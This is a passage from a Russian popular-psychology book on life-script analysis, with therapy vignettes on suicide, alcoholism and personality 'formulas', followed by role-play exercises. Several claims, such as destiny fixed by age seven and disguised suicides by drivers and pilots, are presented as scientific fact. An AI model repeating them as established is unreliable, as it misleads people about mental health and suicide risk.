ненормально. Живут по формуле. По сценарию. …Психолог сидит в своем кабинете, хмуря лоб и изображая мудреца. Перед ним сидит робкий, на первый взгляд, юноша со стопкой листков. Юноша — это пациент, а стопка листов это его жизнеописание, начиная от момента "первой памяти" и заканчивая сегодняшним днем. Жизнеописание психотерапевт попросил его написать на предыдущей встрече, попросив писать как можно подробнее и сформулировав вопросы, на которые в этом описании жизни должны быть даны ответы. Психотерапевт прочитал жизнеописание до 7 лет, а остальное отложил. — Почему же вы не читаете дальше, ведь дальше самое интересное, — спросил юноша с некоторым раздражением. — Да нет, — задумчиво ответил психотерапевт, — самое интересное уже произошло, а что у вас было дальше, я вам сам могу рассказать. Все верно. До семи лет "движок скрипта" ("костяк скрипта") уже был создан. Дальше будет лишь его "тюнинг". Дальше ребенок будет встречать все больше и больше людей, причем именно тех, которые будут исполнителями ролей в его скрипте. Если его скрипт — скрипт неудачника, то и встречать он будет только неудачников. Вернее, он может встречать и других людей, очень удачливых, ему самому может не раз улыбаться удача, но он пройдет мимо и удачливых людей, и удачи. Потому что в его скрипте нет для них роли… И далее всю свою жизнь человек будет проигрывать свой скрипт с учетом уже новых, появившихся ролей. Примечание Смотрю на посетителей нашего форума… Есть и баловни судьбы, есть и неудачники, есть и явные антисоциальные психопаты. Всякие есть. Ведь посетители форума — это срез реальной жизни. А вот и социальный хакер с отрицательным уклоном. Уж и так нас из себя пытается вывести и эдак… Не выйдет, не старайся. Мы уже ушли от тех своих скриптов, в которых таким людям было место. Смотрим на него и даже не злимся. Наоборот — жалеем. Потому что примерно понятно, почему он такой и почему так себя ведет. Пытаемся угадать его скрипт. Скорее всего, догадка будет правильной, потому что у всех провокаторов "движок скрипта" примерно одинаков. Наблюдаем дальше. Ан нет. Смотри-ка ты, ошиблись. Это не провокатор. Вернее внешне он провокатор, но по сути своей внутренней — нет. Это человек, которому в скрипте было записано, что его все время будут бить. И все его поведение вызывающее — это не провокаторство, это желание спровоцировать свое избиение, доведя администрацию форума и некоторых посетителей "до белого каления". Не будем мы тебя бить, тебя и так бьют все кому не попадя. А вот здесь — стоп. Здесь внимательно: это к нам пришел разрушитель. Почти классический "скрипт Герострата". Этого модерировать, модерировать и модерировать. Даже то, что он пишет "по делу". Потому что нужно чтобы он быстрее ушел с форума, пускай в другом месте крушит и рушит… Как жаль, что у нас в вооруженных силах нет психологов, вон сколько генералов большезвездных с геростратовскими скриптами только по телевизору показывают… Вся цель скриптового анализа — превратить неудачников в удачливых, выяснив предварительно, согласно какого скрипта они действуют. Это и есть сценарное перепрограммирование. Вещь сложная и серьезная. Кто бы спорил… Переделать судьбу человека — это не может быть просто. Но вполне возможно. Примеров — много. Естественно, уже положительных. Примечание Сложность в сценарном перепрограммировании нередко заключается в том, что люди часто пытаются стать счастливыми совсем не для того, чтобы им стать по факту, т. е. не для того, чтобы быть счастливым и жить счастливо. А лишь только для того, чтобы стать "более успешным неудачником". Потому что если человек становится счастливчиком, ему приходится выбросить свой скрипт, а большинство людей делают это крайне неохотно. Ну что ж, пойдем дальше, — посидим на приеме у психотерапевта и посмотрим, какие скрипты бывают. Вот зашел грузный усатый дяденька. Жалуется на то, что ничего не успевает… Хоть и на машине везде ездит, а все равно ничего не успевает. На машине? Это интересно. — А у вас часто бывает так, что бензин вдруг заканчивается за 10 метров до заправки, и вам машину толкать приходится с помощью всех, кто в ней на ваше счастье оказался? — спрашивает психолог. — Да почти каждый раз такое… А откуда вы это узнали? А оттуда, что вы не первый. Не у вас одного за 10 метров до заправки кончается бензин, хотя если не сломан указатель топлива в машине, то о том, что бензин скоро может кончиться известно всегда заранее. Мы же смотрим на этот указатель, планируем "чуть позже" заехать на заправку и, как всегда, не заезжаем, отложив на потом. А потом толкаем машину, потому что бензин почему-то "вдруг внезапно" закончился. И в жизни у таких людей все точно так же. А история с бензином — это всего лишь рядовая сцена в пьесе, которую играет неудачник. Примечание Это один из ряда вопросов, которые в серьезных фирмах задают устраивающимся на работу. Часто ли у вас заканчивается бензин за 10 метров до заправки? Часто? Извините, вы нам не подходите. А вот еще девушка. Миловидная такая, но уже с какой-то фантомной печатью на лице. Так оно и есть. Девушка решила совершить самоубийство. Только скрипт, видно, "дал сбой", и она пришла к психотерапевту. Бывает такое со скриптами, недопрограммировал где-то программист… Девушка рассказывает, что "как-то вдруг почувствовала непреодолимую тягу к самоубийству". Не как-то и не вдруг, конечно… Наверняка в семье уже были самоубийцы, и наверняка все ее воспитание в детские годы велось по принципу "Жизнь — обман с чарующей тоскою". (Это у Есенина такие строки есть.) А вот почему вдруг девушка почувствовала это стремление сейчас — это вопрос, в котором стоит разобраться. Может быть, ее отец покончил жизнь самоубийством в том возрасте, в котором она сейчас? Нет, наверное, все чуть-чуть не так. В данном случае виноват так называемый эффект Вертера. Вертер — это главный герой романа Гете "Страдания юного Вертера", который в романе заканчивает жизнь самоубийством. Роман этот прославился среди прочего и тем, что после его выхода в Европе случилась массовая волна подражательных самоубийств (в книге тема самоубийства — центральная). В ряде стран даже запретили публикацию этого романа. Очень много изучал эффект Вертера американский психолог Д. Филипс, который пришел к потрясающим выводам. Анализируя статистику самоубийств, Филипс пришел к выводу, что после публикаций в газетах историй о самоубийствах количество самоубийств возрастало. Причем именно в тех регионах, где вышла публикация. Интересная и драматическая вещь. Ученый из этого сделал вывод, что это скопированные самоубийства, т. е. люди, прочитав заметку в газете, приходили к выводам о том, что для них аналогичный путь — самый лучший. Примечание Конечно, заметка в газете это лишь толчок к развязке скрипта. Реально же все было запрограммировано заранее. "Роковые письмена" уже написаны, если выражаться строкой из того же стихотворения Есенина. Филипс, кроме того, выяснил, что после подобных публикаций возрастало также число погибших в авиа- и автокатастрофах! Мистика, казалось бы? Нет, это объясняется тем, что некоторые люди совершают "замаскированное самоубийство". Известно, что церковь и многие люди осуждают самоубийство. Поэтому, избавляя семью от этого ярлыка, многие совершают самоубийство так: едя на машине нажимают газ там, где нужно жать тормоз. То же самое делают и пилоты некоторых самолетов: "штурвал вниз" и — верная смерть. Это — научные данные. Количество аварий после публикаций о самоубийствах резко возрастает. Более того, если, к примеру, в газете, сообщали о самоубийстве молодого человека, то в данном регионе увеличивалось число автокатастроф, участниками которых были именно молодые люди. Теперь выйдем на некоторое время из кабинета психолога и обратимся к теории. Скрипты в человеческой судьбеСначала сложно поверить в то, что вся судьба человека, все поступки, которые он совершает в жизни, будет он героем или подонком, все это решается ребенком в возрасте не старше 7 лет. Однако в это уже легче верится после общения с трехлетними и семилетними детьми, а также после того, как посмотришь на всю нашу жизнь. Причем самое опасное, когда люди, "играя свой скрипт", являются политическими деятелями и имеют большое влияние на общество, которое убеждают в том, что надо жить так, как они говорят. Или, с точки зрения скриптового анализа, нужно жить так, как им когда-то приказали жить их родители. К счастью для нас, кроме таких людей есть люди с хорошими скриптами, и есть те, кто сумел освободиться от своих плохих скриптов и приобрел права жить по-своему. Таким образом, скрипт — это то, что человек сам для себя запланировал в раннем детстве, в большинстве случаев, при помощи своих родителей. Мы уже говорили о том, что родительские скрипты — самые сильные. По мнению Берна это происходит потому, что родители представляются ребенку в виде этаких великанов, наделенных какой-то магической силой. В это несложно поверить, учитывая то, что родители в несколько раз выше, в несколько раз шире своего ребенка и совершают волшебные, с его точки зрения, действия. Вернемся в кабинет психолога. Старшеклассник. Привела мать. Проблема — сильно пьет. Скрипт? Не исключено. Дальнейшие расспросы показали, что действительно скрипт, и на "питье" он уже был запрограммирован с пятилетнего возраста. И запрограммирован не кем иным, как своей матерью. Что же тогда произошло? А произошла сцена, которая из раза в раз повторяется в семьях алкоголиков. Мать зашла и застала ребенка за тем, что он рассматривал бутылку водки, которая осталась от недавнего застолья. — Что ты делаешь, — закричала она, — тебе еще рано пить. Это могут делать только взрослые мужчины! А он не делал ничего особенного. Просто рассматривал бутылку. Просто из детского любопытства. А мама его своими фразами запрограммировала на дальнейшее питье. Вот и получилось, как по ее рассказу: "до 15 лет был примерным, ни разу не выпивал, а потом как сорвался". Да не сорвался он. Просто решил, что уже настало время, когда можно, т. е. когда уже не рано. Ведь фразой "Тебе еще рано пить" мать подсознанию ребенка сказала не что иное, как "придет время, и пить тебе будет можно". Более того, второй фразой "это могут делать только взрослые мужчины" в подсознание ребенка была вложена установка, что "когда ты станешь взрослым мужчиной, пить тебе будет можно". Что из этого следует? Правильно. Что критерий взрослости мужчины — это тот момент, когда он сможет начать пить. Значит, для того чтобы стать Взрослым мужчиной, нужно начать пить. Вот исток алкоголизма в данном конкретном случае. Снова вернемся к теории. Анекдот в тему Все думали, что из-за того, что мальчик Вова родился в доме рядом с винно-водочным магазином, его судьба была предрешена! Но нет! Он вырос, окончил школу с золотой медалью, институт с красным дипломом, потом устроился на мебельную фабрику и там спился. Параметры характера или формула удачиБерн предложил описывать характер человека по трем параметрам: • Я (отношение к себе); • ВЫ (отношение к близким); • ОНИ (отношение к людям). Известный российский психотерапевт М. Литвак добавил к этим трем параметрам еще один — ТРУД (отношение к предметной деятельности). В каждой из этих позиций у конкретного человека может быть знак "+" или "-". Рассмотрим эти позиции подробнее. • Я+ Такой человек воспринимает себя как благополучную личность и ведет себя как благополучная личность. • Я- Этот человек воспринимает себя как неблагополучную личность, как неудачника. Даже если у него и случаются успехи, то он их считает случайными. И даже в моменты успеха его не покидает чувство неуверенности, чувство непрочности этого успеха. Все неудачи же воспринимаются им как совершенно закономерное явление. Такой человек — дитя жизненных обстоятельств. Как правило, у таких людей чрезмерно высокий уровень притязаний. Это закономерность: чем выше у человека уровень притязаний, тем ниже его самооценка, и даже при наличии реальных успехов он будет чувствовать себя несчастным (потому что уровень притязаний слишком завышен). В этом, кстати, корень большинства неврозов. • ВЫ+ Примечание Известно, что если человека, который считает себя бедным, озолотить с ног до головы, то он не станет от этого богатым. Потому что все равно будет считать себя бедным, даже если будет ходить в расшитых золотом одеждах. Ему все время будет чего-то не хватать: есть одежда, — будет не хватать машины, есть машина — самолета и т. д. С другой же стороны, человек, который считает себя богатым, не будет выглядеть бедным, даже если внезапно останется без средств к существованию. Для него это будет не бедность, а "временные финансовые трудности". Человек со знаком плюс в позиции ВЫ считает близких людей благополучными людьми и в разговорах с ними вербально и невербально обращается только к их положительным качествам. Такой человек дружелюбен, предпочитает компромиссы ссоре. К недостаткам своих партнеров по общению (которые он прекрасно видит) он относится как к шипам у розы: наслаждается запахом розы, при этом стараясь не наткнуться на шипы. • ВЫ- Такой человек рассматривает людей своего близкого окружения как неблагополучных и изначально настроен на конфликт с ними. В людях он видит только недостатки. В аналогии с шипами у розы, он все время натыкается только на шипы, не чувствуя при этом, что у розы кроме шипов может быть еще прекрасный запах. Такие люди придирчивы, стремятся перевоспитать других, излишне саркастичны. Они готовы даже по незначительному поводу затеять большую ссору с дальнейшим разрывом отношений. Безболезненно сосуществовать рядом с такими людьми можно только постоянно, и во всем им уступая. • ОНИ+ Личность с плюсом в позиции ОНИ расположена к людям, легко заводит новые контакты. • ОНИ- В этом случае наоборот: человек стремится избегать новых контактов, при возникновении новых знакомств застенчив и неуверен. Очень медленно адаптируется к новой обстановке. • ТРУД+ Такой человек живо относится к своей деятельности, постоянно самосовершенствуется, ему нравится сам процесс труда, он хочет внести свой творческий вклад в то, что он делает. Важно то, что процесс труда для такого человека — первичен. Материальные ценности, награды и прочие блага отходят на второй план, при этом самое интересное, люди с позицией ТРУД+ почти всегда их получают, не в пример тем, у кого материальные ценности на первом месте. • ТРУД- У такой личности процесс труда — вторичен. На первое место выходят те материальные блага, которые личность может получить в процессе своего труда. Такой сотрудник, к примеру, постоянно ищет более выгодную работу, и все время смотрит как бы его только не обделили при распределении материальных благ. Таким образом, мы приходим к выводу, что структура характера гармоничной личности определяется следующей формулой, и не будет большой натяжкой, если эту формулу мы назовем формулой удачи: Примечание Это очень сложно бывает объяснить… что материальные блага — вопрос вторичный. Нередко все сознание человека противится этому положению. Посылаешь человека на учебу, а он мало того, что ехать не особо хочет (казалось бы, самосовершенствование за счет фирмы!), так еще и спрашивает, сколько ему за это доплатят к основной зарплате. Или другой пример. Говоришь сотруднику: нужно вот это освоить. "Освою, — отвечает, — если мне доплатят вот столько-то". Ясно, что такие люди никогда не станут богатыми, в том числе и в материальном плане, несмотря на то, что сами этого страстно желают. Не станут по одной простой причине. Если исключить все прочие способы наживы, получать хорошие деньги за свой труд может только специалист экстра-класса. А для того, чтобы стать таким специалистом, нужно совершенствоваться каждый день, без отгулов и выходных. А для того, чтобы так поступать, нужно очень любить свое дело. Сильнее, чем деньги. Если бы мы, когда писали книгу, все время мысленно калькулировали в уме, сколько же мы за нее получим гонораров, то мы бы ее либо вообще не написали, либо написали так, что она была бы аутсайдером рейтингов продаж. Мы не знаем, и не разу не видели ни одного писателя, в том числе и с миллионными гонорарами на счетах, который бы стал знаменитым, если бы писал свои книги только с целью получения гонораров. В первую очередь пишется для дела и ради дела. Пишут, потому что не могут не писать. А потом уже приходит и слава, и гонорары, и награды. Потому что все это приходит только в награду за хорошо сделанное дело. А хорошо сделать дело можно только в том случае, если делаешь его только ради дела. Зато все мы видели нашу сборную по футболу. Аутсайдерскую. Футболисты которой, являясь легионерами различных зарубежных клубов, играют в сборной в первую очередь не за игру, а только за деньги. Все видели, как они играют. Даже для человека, не разбирающегося в футболе, это позорище, а не игра. Также мы видели много сотрудников, которые из кожи лезут, чтобы стать богатым, действуя при этом по принципу: "я буду делать только то дело, которое принесет мне большой и, желательно, немедленный, доход". Это все равно, что писатель сказал бы: "Я буду писать только ту книгу, за которую мне дадут Нобелевскую премию в области литературы". Ясно, что богатство — это не их удел. Я+, ВЫ+, ОНИ+, ТРУД + Задача сценарного перепрограммирования — привести структуру личности к этому идеалу. Самое интересное, что почти каждый из нас уже был обладателем характера, подчиняющегося этой счастливой формуле. Да, да, в том самом детстве. Пока большинство из нас еще не успели испортить воспитанием, не успели вогнать в сценарий, от которого кому-то пришлось избавляться собственными усилиями, подчас титаническими, кому-то с помощью психотерапевта, а кто-то так и не сумел или не успел выскочить из сценария… Ведь вспомним себя в самом раннем детстве. А те, у кого не получится вспомнить, посмотрите на детей возраста от года до трех. Как он к себе относится? Да расчудесно! (Я+). А как он относится к своим родителям? Прекрасно! (ВЫ+). А к друзьям? Посмотрите на маленьких детей: как быстро и легко они заводят себе новые знакомства. Ясно, что здесь ОНИ+. У этих детей еще нет никаких условностей, нет социальных барьеров, нет деления на касты… Условности и барьеры начнут формироваться чуть позже… "А вот мой папа — капитан, а твой — дворник, поэтому ты не будешь играть в нашей песочнице, иди вон туда, в ту, которая похуже, в которой песок погрязнее". Все — пошло деление на касты. И пошло формирование минуса в позиции ОНИ. А теперь скажите мне, откуда ребенок смог узнать, что папа-капитан это хорошо, а папа-дворник — плохо? Правильно, от родителей… Потом, много позже, когда, прожив много лет в сценарии, он вдруг поймет, что ему всю жизнь мешало то, что он общался не с теми, с кем хочется, а с теми, "с кем надо", он скажет за это своим родителям "большое спасибо". А посмотрите как ребенок относится к труду? Он ведь делает только то, что ему хочется, и получает от этого удовольствие (ТРУД+). Правда, недолго. Потому что потом вмешиваются родители, и заставляют делать не то, что хочется, а то, что надо, причем надо им, а не ребенку. И, естественно, тем самым формировать минус в позиции ТРУД. Примечание Почему "почти каждый"? Потому что некоторых детей особо одаренные родители успевают "испортить" еще на этапе внутриутробного развития. То, как это может происходить, и то, как этого избежать, изучает наука под названием паранатальная психология. — Ты читать хочешь? Не, читать позже. Потому что сейчас мы пойдем гулять. Мало ли, что не хочешь сейчас гулять. Надо. Потому что позже я не смогу. Ну что ты разревелся? На вот тебе конфетку. …Понимаете, какой парадокс получается? Изначально гармоничных личностей (детей) воспитывают по большей части личности уже не гармоничные, с минусом в одной или нескольких позициях (родители). А теперь вслед за Э. Берном и М. Литваком попробуем взглянуть на этот мир глазами маленького ребенка… И еще раз проследим, как начинают формироваться минусы в позициях… Разумеется, для примера мы возьмем не самый лучший вариант воспитания, увы, встречающийся слишком часто… …Вот я еще такой маленький, и меня держат за руки большие "великаны". Это — мои родители. А иногда к нам приходят другие "великаны" — родители моих родителей, мои бабушка с дедушкой и ругают моих родителей за то, что они меня неправильно воспитывают. Правда, вероятно, бабушку с дедушкой тоже когда-то неправильно воспитали, иначе бы они знали, что при детях такого говорить нельзя. Ну ладно бабушка. Она хоть в армии не служила. А дедушка-то должен был знать, что старшие офицеры не выговаривают младшим в присутствии их подчиненных. Вы думаете, что если я сопливый и в слюнях, то ничего не понимаю. А я все понял. Я понял, что моим родителям доверять нельзя. …Мама, а ты помнишь, после того, как ты устала на работе, забрала из садика, а когда мы пришли домой… Ты помнишь, что ты сказала, когда я попросился погулять? — Да что ж ты нам жить-то мешаешь? Как мне хотелось вам ответить… — Я?! Вам?! А когда вы меня зачинали, вы каким центром головного мозга думали? Только тем, который отвечает за точные двигательные движения? Мамочка, если бы я тебя не любил так, как я тебя люблю, я бы тебе сказал, что ты дура. Нет, не в качестве оскорбления, а сугубо в рамках трансакции В — В, т. е. не для обиды, а без эмоций, — только для отражения реально существующего факта. А зачем, когда вы со мной говорите, вы нарочно коверкаете слова? Зачем вы говорите "мямя" вместо "мама"? Неужто вы думаете, что я вас так лучше пойму?! Вы попробуйте на своей работе так с кем-нибудь поговорить, и посмотрите, как вас будут понимать. Если бы вы чуть лучше учились в школе, то знали бы, что я так говорю не из-за вредности, а из-за того, что у меня еще нет некоторых зубиков, а те, что есть, — выросли криво. А вы-то зачем так говорите? Ну ладно — хочется вам и говорите, я уже научился вас понимать. Только не обижайтесь потом, когда я буду говорить так до семи лет. Это я не из-за того, что говорить правильно не умею, а только для того, чтобы и вам "жизнь медом не казалась". Я ведь учился вас понимать, когда вы слова коверкали, теперь и вы помучайтесь. Если честно, чем дальше, тем больше я вас не понимаю. Вы то смеетесь, то плачете. Причем, с моей точки зрения, совершенно невпопад. Как депрессивные больные в психиатрической больнице. Вот почему вы вчера плакали и говорили, какой я ужасный ребенок, когда я под прекрасным летним солнышком после чудесного летнего дождя, когда в небе сияла радуга, пробежал по луже? Это я не от озорства, папа. Это я оттого, что вы еще не убили во мне природное стремление радоваться солнцу, воде и свежему воздуху. Вот я и радовался. А мама плакала, а ты, папа, ругался. А сегодня, когда я крушил и ломал стулья, вы наоборот смеялись. Вам, наверное, хочется, чтобы я стал Геростратом. А почему вы все время говорите "Не делай то", "Не делай это"? Ах, да, простите, забыл: вы же не знаете нейролингвистического программирования, и не в курсе, что в инструкциях не должно быть отрицаний, а должны быть четкие указания о том, что нужно сделать. Мамочка, зачем ты говоришь мне, что детство — счастливая пора? Какая же она счастливая, если детство — это рабство? Не, рабство, папочка? Ты видно, плохо в школе учился, иначе бы знал, что раб — это человек без прав. Который может делать только то, что угодно его повелителям, а не то, что он сам хочет делать. И скажите мне на милость — чем я не подхожу под это определение? Ведь таким, какой я есть на самом деле, я вам не нужен. Вам вообще нужен не я. А то, что соответствует вашим представлениям о том, какими должны быть дети. Я с самого рождения понял, что я не соответствую вашим ожиданиям. Вы все время хмурились, ругали меня. Я еще не понимал слов, но уже знал, что это вы на меня сердитесь. Причем беспричинно. Как жаль, мамочка с папочкой, что вы в психологии разбираетесь точно так же, как я годовалый в самолетостроении. Иначе бы вы знали, что уже начали формировать мне минус в позиции Я. К сожалению, вы не прочитали ни одной инструкции по воспитанию детей, а зато, когда вы купили стиральную машинку, инструкцию как ей пользоваться вы читали три дня и еще на меня кричали, что я описался, пока вы читали эту инструкцию. А как пользоваться мной, вы думали, что знаете… А помнишь, мамочка, как ты сидела рядом со мной, и, сама себя успокаивая, говорила мне, какие плохие папины родители, мои бабушка с дедушкой, потому что они тебе в очередной раз сказали, что ты меня неправильно воспитываешь. А потом то же самое говорил папа про твоих родителей, тоже моих бабушку и дедушку. Я, правда, к тому времени уже понял, что в возрасте трех лет разбираюсь в самолетостроении гораздо лучше, чем вы в психологии, и догадался, что таким образом вы мне хотите сформировать минус в позиции ВЫ. Вам видно одного минуса показалось мало, и вы захотели сделать так, чтобы я был полностью на вас похож. Примечание Многие нынешние родители, когда чего-то не понимают в инструкции по пользованию ребенком, набирают проблему в одном из поисковиков Интернета. А еще помнишь, как ты сказала, что все мои друзья — грязнули и грубые невоспитанные мальчики, и что мне, такому чистенькому и опрятному, с ними дружиться нельзя? Я тебе объясню, мама: это ты мне формировала минус в позиции ОНИ. Ах, если бы ты знала мама, как мне хотелось тогда убежать с этими грубыми грязнулями в лес, построить там шалаш и посидеть ночью у костра, встретить рассвет, такой девственно чистый, и хотя бы ночь не видеть вас с папой. Да, да, мама, это мне из-за того так хотелось, что минус в позиции ВЫ вашими стараниями уже был сформирован. Правда, я не успел убежать. Потому что минус в позиции ОНИ ты мне успела сформировать раньше, чем я убежал. С тех пор я не с кем не дружусь… Но знаешь мама, хоть мне сейчас уже тридцать пять, мне иногда ночью снится этот девственно чистый рассвет, который мы с друзьями встречаем у костра, все такие грязные и беззаботные… Но это только во сне… Потому что в жизни я все такой же опрятный мальчик, и "дружу" только с такими же опрятными мальчиками и девочками, такими же скучными и больными, как я… …Продолжать можно долго, но думаю, что читателям уже все понятно. Вернемся в кабинет к психологу. А это кто к нам пожаловал? Серьезный начальник большой конторы. У него-то что за проблемы? А, оказывается, не у него лично, а у его фирмы. А проблема в том, что его сотрудники не могут себя нормально вести с клиентами почему-то. Что ж, давайте сходим к вам в фирму и посмотрим, почему. Пришли, посмотрели, поговорили. Все понятно. Почти у всех, кто занимался работой с клиентами — минус в позиции ОНИ. И ставить таких людей на работу с клиентами вряд ли стоит. Вообще, нужно сказать, что проблема с сотрудниками, которые живут в жизни по отрицательным сценариям — вещь крайне серьезная. Приведенный пример — очень легкий, потому что бывают вещи и похуже. Что вы скажете, к примеру, если у вас в фирме работают сотрудники с позицией "ТРУД-"? Если вы считаете, что быстро распознаете такого человека, то, можно сказать, что это еще совершенно не факт. Потому что человек с позицией ТРУД- вполне может быть круглым отличником в школе и в институте, победителем кучи олимпиад и т. д. и т. п. Как в таком заподозришь "лентяя"? А между тем, если во всех остальных позициях у человека плюс, то именно так и бывает, и этот комплекс по М. Литваку называется "Евгений Онегин", и выражается формулой: Примечание Комплекс, при котором у человека минус только в позиции ОНИ, а во всех остальных плюс, М. Литвак называет комплексом "Творческий сноб". Такие люди имеют узкий круг общения, любят свою работу, и в принципе, к примеру, на работе, могут неплохо чувствовать себя в группе, если в ней не очень много людей, и они с ними хорошо знакомы. Но новые знакомства для них в тягость, они ни заводить их не умеют, ни что с ними делать потом не знают. Это люди микроклимата и микрогруппы. Я+, ВЫ+, ОНИ+, ТРУД- Вспомните Онегина. У него были хорошие способности, ему все легко давалось, что в результате привело к тому, что "труд упорный ему был тошен"… Вот именно неспособность к упорному труду и отличает "Онегиных". Судьба таких людей нередко предсказывается с математической точностью. Сначала они показывают очень хорошие результаты, из-за которых учителя (профессора, работодатели) так к ним благоволят. Почти всегда — это школьные и вузовские отличники, имеющие красный диплом. Но "онегины" — "верхушечники", т. е. ни одной профессией они глубоко не владеют. И как только в том деле, которым они занимаются, встречаются какие-то "заковыристые места", над которыми нужно много думать, они это дело бросают и переключаются на другое. А поскольку ни одной профессией овладеть высокопрофессионально нельзя без серьезных усилий, то, в конце концов, любой серьезный труд их разочаровывает и они… Правильно: ищут утешения в любви. И к годам 22 — 24 становятся неплохими ловеласами. Правда, до семейной жизни дело часто не доходит (т. к. с этого момента начинается серьезный труд) и все заканчивается на этапе близком к зачатию ребенка или сразу после того, как подруга "онегина" забеременеет. Мы знаем нескольких таких "Онегиных", которые де-факто являются отцами нескольких детей, при этом, не состоя в законном браке ни с одной из своих подруг, потому что бросают их как только дело начинает близиться к семейной жизни. Или сразу после ее начала. Со временем и любовь уже не приносит им утешения, т. к. они делают это дело уже практически "на автомате". В силу этого на данном этапе у "Онегиных" начинает формироваться минус в позиции ВЫ. (Вернее, начинает он формироваться чуть раньше: когда те, кто ранее был ими восхищен, после того, как понимают, что эти люди долго и упорно работать не могут, начинают в них разочаровываться. А на этом этапе он просто усиливается.) И, как только у "онегина" в его формуле характера появляется еще минус в позиции ВЫ, у него возникает реактивная депрессия, которая заканчивается либо самоубийством, либо алкоголизмом и наркоманией. Как правило, это происходит к 30 годам.
-
Обязательно попробуйте себя в различных ролях. Относитесь к этому как к заданию, которое просто необходимо выполнить. Ничего страшного, что вы так никогда не поступали, и сам факт того, что вам придется себя так вести, противоречит всей вашей натуре. Суть тренировки именно в том и состоит, чтобы "вогнать себя" в такие состояния, в которых вы никогда не были. Зато, прогнав себя через множество ролей, вы сможете быстро перевоплощаться именно в того, в кого надо, а не в того, в кого получилось. Здесь, для примера, мы приведем несколько заданий, список которых вы без труда, войдя во вкус, сможете расширить. Итак. Вы — молчун Сегодня вы весь день молчите. Ничего страшного, что говорить нужно. Настроение у вас сегодня такое молчаливое. Отделываетесь незначительными "угу", "ага", "да ну" "вряд ли", пожиманием плечами, игрой мимикой лица и т. д. Слушать других не возбраняется, наоборот, — вам сегодня только и остается, что слушать других, поскольку вы сами сегодня права голоса не имеете. Примечание Выходить из образа при выполнении этого или других заданий допускается лишь в форс-мажорных случаях. Вы — говорун А сегодня вы, наоборот, никого не слушаете, а только сами говорите. Без умолку. На любые темы. Перебивая собеседника. Заговаривая по делу и не по делу со знакомыми и незнакомыми людьми. Подходите к прохожим каждые пять минут вашей прогулки по улице и спрашиваете, спрашиваете, спрашиваете… — Который час? — Как пройти к улице Ленина? — Молодой человек, подождите секундочку! Я так и не понял: для того чтобы пройти к улице Ленина, нужно повернуть направо или налево? Днем на работе тоже говорите. С сотрудниками, по телефону, в курилке, неважно где, важно чтобы вы все время что-то говорили. Вечером идете к знакомым и говорите, говорите, говорите… Вы — брюзга Сегодня вы — брюзга. Сегодня вы всем недовольны. Начиная от первого встречного прохожего и кончая внешней политикой, проводимой МИДом на Ближнем Востоке. Вы недовольны сидящими на лавочке женщинами у подъезда, и своим видом, осудительно на них глянув, даете им это показать. Чего, мол, тут расселись, солнце загораживают. Вы недовольны кондукторшей в маршрутном такси, которая дала замызганный билетик, и бурчите ей вслед "У билета уж номера стерлись, я, наверное, пятидесятый человек, который сегодня по нему едет". И, выходя из маршрутки, демонстративно кидаете билет на пол маршрутки. Если вы на машине, то вы сегодня можете себе позволить быть недовольным даже гаишником, который остановил вас за превышение скорости. Ну и пускай, что он вам штраф большой выпишет, вам сегодня главное, что вы всем недовольны. И когда он вас остановит, из машины не выходите, приоткрываете стекло, и, как он подойдет, недовольно и раздраженно спрашиваете "Что вам?". Предложит пройти в машину, не отказывайтесь, но всем видом выражайте свое недовольство, а выходя из своей машины, с силой хлопнете дверью. Понимаю, что вы никогда так не делаете, но сегодня такое задание. Ничего с машиной не случится от одного раза. В магазине вы будете недовольны колбасой, которую вам предложат. И пять раз попросите ее поменять. Знаю, что вы никогда так не поступаете, и что вам уже на третьем разе будет жалко продавщицу, но что делать. Такое задание. Смысл именно в том и состоит, чтобы опробовать роли и психотипы, в которых вы раньше, возможно, никогда не были. Потому что расширить свой кругозор можно только узнавая ранее незнаемое и незнакомое. Применительно к нам, расширить свой психологический кругозор (в чем и смысл тренировки) можно только вживаясь в различные роли. Вы — преступникА сегодня вы — преступник. Нет, убивать и калечить никого не надо, достаточно просто представлять, как вы это делаете. Идете, к примеру, по улице и представляете, как вы наброситесь вон на того мужчину, чтобы он… Ну чтобы не мучился долго. А вон того самодовольного прыща, наоборот — чтоб мучился как можно дольше. В электричке сегодня на свободное место рядом с вами тоже никто не подсядет, потому что всех проходящих мимо вас вы мысленно избиваете. И так его, и так, а потом еще вот эдак. Примечание При достижении некоторого уровня мастерства к вам действительно никто не подсядет даже в переполненной электричке. Я этот фокус показывал своим знакомым, еще учась в университете, когда в электричке, в которой нет свободных мест, и люди уже стоят, единственные два пустые места — рядом со мной. На них нет ни сумок, ни газет, я никому не говорил, что здесь занято, но они все равно оставались пустыми. Вы — жертва Если вашему нутру крайне претило вчерашнее задание, то сегодня отдохните и поиграйте в жертву. Извиняйтесь сегодня перед всеми по делу и не по делу. За вчерашние ваши выходки. В общественном транспорте уступайте всем, даже подросткам. Увидели, что кто-то подошел к месту, на котором вы сидите, тут же неуклюже вскакиваете, и с заискивающей улыбочкой, чуть заикаясь, произносите: "С-садитесь". Если откажутся, — тут же извиняйтесь "Ой, простите" и плюхаетесь обратно на свое место. Как за что извиняться? За то, что отвлекли человека своим "С-садитесь". Придя на работу за десять минут до начала рабочего дня, извинитесь перед всеми. За то, что опоздали. Когда вам скажут, что вы еще рано пришли, снова извинитесь: "Ой, простите, и правда напутал…". И так далее. Вы — наблюдательА сегодня вы — наблюдатель. Сегодня ничто не ускользнет от вашего бдительного ока. И все, что вы наблюдаете, вы записываете аккуратно в блокнотик. Это и есть сегодняшнее задание. Кто сидел на лавочке возле подъезда? Записываем. Какие машины рядом стояли? Пишем. Какие у них номера? Пустые они стоят или в них кто-то сидит? Кто сидит? Мужчина или женщина? Просто сидит, или курит, или читает газету? Как курит — нервно или с выражением безмятежности на лице? В общем сегодня наблюдаете все — любую, даже самую незначительную мелочь. Какая музыка играла в маршрутке? Сколько человек в ней ехало? Какая прическа у кондукторши? Были ли усы у водителя? И так далее. Примечание В групповых тренировках можно даже соревноваться в конце дня — кто больше и качественнее выполнил роль наблюдателя. Вы — снова наблюдатель Только сегодня вы наблюдаете не просто так, как вчера. Сегодня — вы наблюдатель психологический. Сегодня вы всем ставите диагнозы. Водитель, ведущий маршрутку — интроверт или экстраверт? Флегматик или холерик? Почему вон та девушка, на переднем сиденье так нервничает? Присматриваемся. Нет, не из-за того, что куда-то опаздывает — эта, если бы опаздывала, глаз бы с часов не спускала. А она на них и не смотрит. А нервничает сильно, вон пакет в руке как измяла… И смотрит то в окно, то куда-то вглубь маршрутки. На кого это она там смотрит? Приглядимся. Судя по всему вон на того мужчину. Который тоже нервничает. Только 